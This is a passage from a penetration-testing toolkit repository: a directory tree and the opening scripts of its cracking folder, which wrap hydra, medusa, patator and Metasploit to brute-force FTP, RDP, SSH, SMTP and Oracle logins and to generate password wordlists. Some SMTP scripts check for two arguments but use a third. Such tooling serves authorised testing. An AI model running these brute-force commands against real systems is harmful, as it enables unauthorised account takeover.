├── .gitignore
├── LICENSE
├── README.md
├── ad
    └── Readme.md
├── auditing
    └── parse-docker-bench-security-json-file.py
├── automation
    └── nmap_auto.sh
├── cracking
    ├── Readme.md
    ├── anonymous-ftp.sh
    ├── brute-force-ftp-hydra.sh
    ├── brute-force-ftp-medusa.sh
    ├── brute-force-ftp.sh
    ├── brute-force-rdp-hydra.sh
    ├── brute-force-smtp-hydra.sh
    ├── brute-force-smtp-medusa.sh
    ├── brute-force-ssh-hydra.sh
    ├── brute-force-ssh-medusa.sh
    ├── create-password-list-from-rockyou-with-policy.sh
    ├── crunch-charset.sh
    ├── crunch-pattern.sh
    ├── generate-wordlist-from-site.sh
    ├── generate-wordlist.sh
    ├── open-relay-smtp.sh
    ├── oracle-login.sh
    ├── smtp-users-enumeration.sh
    └── ssh-bf.sh
├── enumeration
    └── citrix.list
├── firewall
    ├── extract-country-from-list-subnets.py
    └── subnetslist.example
├── generate-scripts-lists
    ├── dirb-generate-scan.sh
    ├── eyewitness-generate-url-list.sh
    ├── generate-tcp-full-scan-from-live-hosts-fast-noping-nodns.sh
    ├── generate-tcp-srv-scan-from-open-ports-fast-noping-nodns.sh
    ├── generate-tcp-srv-scan-from-open-ports-noping-nodns.sh
    ├── generate-tcp-srv-scan-from-open-ports-noping.sh
    ├── generate-tcp-top1000-scan-from-live-hosts-fast-noping-nodns.sh
    ├── generate-udp-full-scan-from-live-hosts-fast-noping-nodns.sh
    ├── generate-udp-srv-scan-from-open-ports-fast-noping-nodns.sh
    ├── generate-udp-srv-scan-from-open-ports-noping-nodns.sh
    ├── generate-udp-srv-scan-from-open-ports-noping.sh
    └── generate-udp-top1000-scan-from-live-hosts-fast-noping-nodns.sh
├── grep
    ├── grep-host-services-for-excel.sh
    ├── grep-host-services.sh
    ├── grep-list-hosts-and-open-ports-to-csv.sh
    ├── grep-list-hosts-and-open-ports-to-matrix.sh
    ├── grep-list-hosts-and-open-ports-to-txt.sh
    ├── grep-list-hosts-and-open-ports.sh
    ├── grep-list-hosts-having-open-ports.sh
    ├── grep-list-hosts-open-ports-and-services-to-matrix.sh
    ├── grep-list-hosts-open-ports-and-services-to-txt.sh
    ├── grep-unique-hosts-with-open-ports-comma.sh
    ├── grep-unique-live-hosts-comma.sh
    ├── grep-unique-live-hosts-having-more-than-one-port-open.sh
    ├── grep-unique-live-hosts.sh
    ├── grep-unique-open-ports-comma.sh
    ├── grep-unique-open-ports.sh
    ├── grep-web-servers-by-knownports.sh
    ├── grep-web-servers-to-links-txt.sh
    ├── grep-web-servers-to-links.sh
    └── grep-web-servers.sh
├── ldap
    ├── scan-enum4linux.sh
    └── scan-ldapsearch.sh
├── live-hosts
    ├── discover-live-hosts-ack-from-list.sh
    ├── discover-live-hosts-ack.sh
    ├── discover-live-hosts-all-debug.sh
    ├── discover-live-hosts-all.sh
    ├── discover-live-hosts-icmp-echo-from-list.sh
    ├── discover-live-hosts-icmp-echo.sh
    ├── discover-live-hosts-netmask-request-discovery.sh
    ├── discover-live-hosts-oses.sh
    ├── discover-live-hosts-protocol-ping-from-list.sh
    ├── discover-live-hosts-protocol-ping.sh
    ├── discover-live-hosts-sctp-from-list.sh
    ├── discover-live-hosts-sctp.sh
    ├── discover-live-hosts-syn-from-list.sh
    ├── discover-live-hosts-syn.sh
    ├── discover-live-hosts-tcp-internet.sh
    ├── discover-live-hosts-timestamp-from-list.sh
    ├── discover-live-hosts-timestamp.sh
    ├── discover-live-hosts-top100.sh
    ├── discover-live-hosts-udp-from-list.sh
    ├── discover-live-hosts-udp-internet.sh
    ├── discover-live-hosts-udp.sh
    ├── discover-local-live-hosts-arpscan.sh
    ├── discover-local-live-hosts-netbios.sh
    ├── discover-local-live-hosts-netdiscover.sh
    ├── discover-local-live-hosts-passively-p0f.sh
    ├── ping-from-linux.sh
    └── ping.sh
├── m365
    └── Readme.md
├── metasploit
    ├── binding.md
    ├── multi-handler.md
    └── payloads.md
├── misc
    ├── helpful-commands.md
    ├── openvas.md
    ├── port-forwarding.md
    ├── print-top-tcp-ports.sh
    ├── print-top-udp-ports.sh
    ├── responds-to-ping.sh
    ├── socat.md
    ├── ssh.md
    └── stunnel.md
├── mobile
    └── Readme.md
├── nessus
    ├── extract-info-nessus.md
    └── group-nessus-vulnerabilities.sh
├── oracle
    ├── odat-passwordguesser.sh
    ├── odat-ping.sh
    ├── odat-sidguesser.sh
    ├── odat-status.sh
    ├── odat-tnspoison.sh
    ├── odat-version.sh
    ├── oracle-tnscmd-ping.sh
    ├── oracle-tnscmd-version.sh
    └── scanner.sh
├── phishing
    └── dnstwist.sh
├── port-scanning
    ├── tcp
    │   ├── full
    │   │   ├── tcp-ports-scan-full-delay-nc.sh
    │   │   ├── tcp-ports-scan-full-delay-sequential-fulltcpcon.sh
    │   │   ├── tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh
    │   │   ├── tcp-ports-scan-full-delay-sequential-noping.sh
    │   │   ├── tcp-ports-scan-full-delay-sequential.sh
    │   │   ├── tcp-ports-scan-full-fast-noping-nodns.sh
    │   │   ├── tcp-ports-scan-full-maxrate-noping.sh
    │   │   ├── tcp-ports-scan-full-maxrate.sh
    │   │   ├── tcp-ports-scan-full-nodns.sh
    │   │   ├── tcp-ports-scan-full-noping-nodns.sh
    │   │   ├── tcp-ports-scan-full-noping.sh
    │   │   ├── tcp-ports-scan-full-super-fast-noping-nodns.sh
    │   │   ├── tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh
    │   │   └── tcp-ports-scan-full.sh
    │   ├── services
    │   │   ├── tcp-ports-services-scan-top400-noping.sh
    │   │   ├── tcp-services-fast-scan-noping.sh
    │   │   ├── tcp-services-scan-noping.sh
    │   │   ├── tcp-services-scan-top1000-noping.sh
    │   │   └── tcp-services-super-fast-scan-noping.sh
    │   ├── tcp-ports-scan-common-slow-noping-nodns-ratelimited-stealth.sh
    │   ├── tcp-ports-scan-delay-nc.sh
    │   ├── tcp-ports-scan-known-exposed-web.sh
    │   ├── tcp-ports-scan-nc.sh
    │   ├── tcp-ports-scan-top-stealth-paranoid.sh
    │   ├── tcp-ports-scan-top-stealth.sh
    │   ├── tcp-ports-scan-top1000-fast-noping-nodns.sh
    │   ├── tcp-ports-scan-top1000-maxrate-noping.sh
    │   ├── tcp-ports-scan-top1000-maxrate.sh
    │   ├── tcp-ports-scan-top1000-noping-nodns.sh
    │   ├── tcp-ports-scan-top1000-noping.sh
    │   ├── tcp-ports-scan-top1000-slow-noping-nodns-ratelimited-stealth.sh
    │   ├── tcp-ports-scan-top1000-slow-noping-nodns.sh
    │   ├── tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh
    │   ├── tcp-ports-scan-top1000.sh
    │   ├── tcp-ports-scan-top2000-noping-nodns.sh
    │   └── tcp-scan-web-server.sh
    └── udp
    │   ├── full
    │       ├── udp-ports-scan-full-fast-noping-nodns.sh
    │       ├── udp-ports-scan-full-nodns.sh
    │       ├── udp-ports-scan-full-noping-nodns.sh
    │       ├── udp-ports-scan-full-noping.sh
    │       ├── udp-ports-scan-full-super-fast-noping-nodns.sh
    │       └── udp-ports-scan-full.sh
    │   ├── services
    │       ├── udp-services-fast-scan-noping.sh
    │       ├── udp-services-scan-noping.sh
    │       ├── udp-services-scan-top1000-noping.sh
    │       ├── udp-services-scan-top400-noping.sh
    │       └── udp-services-super-fast-scan-noping.sh
    │   ├── udp-ports-scan-common-noping-nodns-slow-ratelimited-stealthy.sh
    │   ├── udp-ports-scan-known-exposed-web.sh
    │   ├── udp-ports-scan-top100-unicornscan.sh
    │   ├── udp-ports-scan-top1000-fast-noping-nodns.sh
    │   ├── udp-ports-scan-top1000-nodns.sh
    │   ├── udp-ports-scan-top1000-noping-nodns-slow-ratelimited-sleathy.sh
    │   ├── udp-ports-scan-top1000-noping-nodns.sh
    │   ├── udp-ports-scan-top1000-noping.sh
    │   ├── udp-ports-scan-top1000-super-fast-noping-nodns.sh
    │   └── udp-ports-scan-top1000.sh
├── reconnaissance
    ├── ftp-banner.sh
    ├── hostname.sh
    ├── ip.sh
    ├── ips.sh
    ├── mx.sh
    ├── nameservers.sh
    ├── shodan
    │   └── shodanhat
    │   │   ├── LICENSE
    │   │   ├── README.md
    │   │   ├── __init__.py
    │   │   ├── constantes.py
    │   │   └── shodanhat.py
    ├── smtp-banner.sh
    ├── web-reconnaissance.py
    ├── webrecon.sh
    ├── whois.sh
    └── zone-transfer.sh
├── sip
    ├── scanner-svwar.sh
    └── sip-dos.sh
├── skid
    ├── README.md
    └── scan-external-ip-range.sh
├── smb
    ├── null-session.sh
    ├── scan-enum4linux.sh
    ├── scan-execute-command.sh
    ├── scan-list-contents.sh
    ├── scan-nbtscan.sh
    ├── scan-share-permissions.sh
    └── scan-smbclient.sh
├── smtp
    └── user-enum.sh
├── snmp
    ├── community.lst
    ├── discover.sh
    ├── scan.sh
    └── walk.sh
├── sqli
    ├── mssql.md
    └── sqlmap.md
├── ssl
    ├── ssl-scan.sh
    └── tlssled.sh
├── web
    ├── banner-grabbing-curl-http-proxy.sh
    ├── banner-grabbing-curl-http.sh
    ├── banner-grabbing-nc-http.sh
    ├── banner-grabbing-nc.sh
    ├── banner-grabbing-nmap-built-in.sh
    ├── banner-grabbing-nmap-script.sh
    ├── banner-grabbing-wget-http.sh
    ├── check-urls.py
    ├── compare-post-data.py
    ├── content-type-checker.py
    ├── curl-delete.sh
    ├── curl-get.sh
    ├── curl-options-proxy.sh
    ├── curl-options.sh
    ├── curl-post.sh
    ├── curl-put.sh
    ├── curl-robots.sh
    ├── curl-trace.sh
    ├── dir-scanner-dirsearch-big.sh
    ├── dir-scanner-dirsearch-medium.sh
    ├── dir-scanner-ffuf-timeout.sh
    ├── dir-scanner-ffuf.sh
    ├── dir-scanner-fine-tuned.sh
    ├── dir-scanner-gobuster.sh
    ├── dir-scanner-proxy.sh
    ├── dir-scanner.sh
    ├── extract-urls.py
    ├── eyewitness.sh
    ├── headers-checker.py
    ├── html-to-png-screenshot.sh
    ├── lists
    │   ├── big.list
    │   └── common-content-types.list
    ├── nikto-scan-proxy.sh
    ├── nikto-scan-useragent-proxy.sh
    ├── nikto-scan-useragent.sh
    ├── nikto-scan.sh
    ├── nikto.md
    ├── robots-ssl.sh
    ├── robots.sh
    ├── screenshot.sh
    ├── web-app-framework.sh
    ├── web-headers-malformed-2.sh
    ├── web-headers-malformed.sh
    ├── web-headers-null.sh
    ├── web-recon.sh
    └── wordpress-scan.sh
├── wifi
    ├── wifi.md
    └── wpa2.md
└── windows
    ├── Readme.md
    └── wmi.md


/README.md:
--------------------------------------------------------------------------------
 1 | ## PenTestKit
 2 | 
 3 | *Useful tools & scripts during Penetration Testing Engagements*
 4 | 
 5 | ***
 6 | 
 7 | ### Download - Installation
 8 | 
 9 | ```bash
10 | git clone https://github.com/maldevel/PenTestKit.git
11 | cd PenTestKit/
12 | ```
13 | 


--------------------------------------------------------------------------------
/cracking/Readme.md:
--------------------------------------------------------------------------------
 1 | ## README
 2 | 
 3 | ### Detecting SSH and Brute-forcing it
 4 | 
 5 | ```sh
 6 | nmap -p 22 --open -oG live_hosts.txt x.y.z.0/24
 7 | grep "Up" live_hosts.txt | awk '{print $2}' > ips.txt
 8 | hydra -l Administrator -P passwords.lst -M ips.txt ssh -t 4
 9 | ```
10 | 
11 | ---
12 | 


--------------------------------------------------------------------------------
/cracking/anonymous-ftp.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | msfconsole -n -q -r - << EOF
26 | use auxiliary/scanner/ftp/anonymous
27 | set RHOSTS $1
28 | run
29 | exit
30 | EOF
31 | else
32 |     echo "Please provide the target ftp server."
33 | fi
34 | 


--------------------------------------------------------------------------------
/cracking/brute-force-ftp-hydra.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $2 -e nsr -f -o "ftp_$1_$2_hydra.txt" ftp://$1
26 | else
27 |     echo "Please provide the target FTP server and its port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/brute-force-ftp-medusa.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "ftp_$1_$2_medusa.txt" -M ftp -h $1
26 | else
27 |     echo "Please provide the target FTP server and its port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/brute-force-rdp-hydra.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $2 -e nsr -f -t 2 -o "rdp_$1_$2_hydra.txt" rdp://$1
26 | else
27 |     echo "Please provide the target RDP server and its port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/brute-force-smtp-hydra.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     hydra -v -l $1 -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $3 -e nsr -o "smtp_$2_$3_hydra.txt" -f smtp://$2
26 | else
27 |     echo "Please provide the target email account, the SMTP server and its port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/brute-force-smtp-medusa.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     hydra -v -l $1 -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $3 -e nsr -o "smtp_$2_$3_hydra.txt" -f smtp://$2
26 |     medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "smtp_$1_$2_medusa.txt" -M smtp -h $1
27 | else
28 |     echo "Please provide the target email account, the SMTP server and its port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/cracking/brute-force-ssh-hydra.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $2 -e nsr -f -o "ssh_$1_$2_hydra.txt" ssh://$1
26 | 
27 | else
28 |     echo "Please provide the target SSH server and its port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/cracking/brute-force-ssh-medusa.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "ssh_$1_$2_medusa.txt" -M ssh -h $1
26 | else
27 |     echo "Please provide the target SSH server and its port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/crunch-charset.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 3 ]; then
25 | 	crunch $1 $2 -f /usr/share/crunch/charset.lst $3 -o crunch-wordlist-$1-$2-$3.txt
26 | else
27 |     echo "Please provide minimum password length, maximum password length and charset string."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/crunch-pattern.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 3 ]; then
25 | 	crunch $1 $2 -t $3 -o crunch-wordlist-$1-$2.txt
26 | else
27 |     echo "Please provide minimum password length, maximum password length and charset string."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/generate-wordlist-from-site.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 | 	cewl $1 -m $2 -w $1-wordlist.txt
26 | else
27 |     echo "Please provide a website and a password length."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/generate-wordlist.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 	cat $1 | rsmangler --file - > $1_passwordlist.txt
26 | else
27 |     echo "Please provide a list of words."
28 | fi
29 | 


--------------------------------------------------------------------------------
/cracking/open-relay-smtp.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | msfconsole -n -q -r - << EOF
26 | use auxiliary/scanner/smtp/smtp_relay
27 | set RHOSTS $1
28 | run
29 | exit
30 | EOF
31 | else
32 |     echo "Please provide the target SMTP server."
33 | fi
34 | 


--------------------------------------------------------------------------------
/cracking/oracle-login.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 3 ]; then
25 | 	patator ssh_login host=$1 user=$2 password=FILE0 0=$3
26 | 	patator oracle_login host=$1 port=$2 user=COMBO00 password=COMBO01 0=/usr/share/seclists/Passwords/Default-Credentials/oracle-betterdefaultpasslist.txt -x ignore:code=ORA-01017 -x ignore:code=ORA-28000
27 | 
28 | else
29 |     echo "Please provide a target host and a port."
30 | fi
31 | 


--------------------------------------------------------------------------------
/cracking/smtp-users-enumeration.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
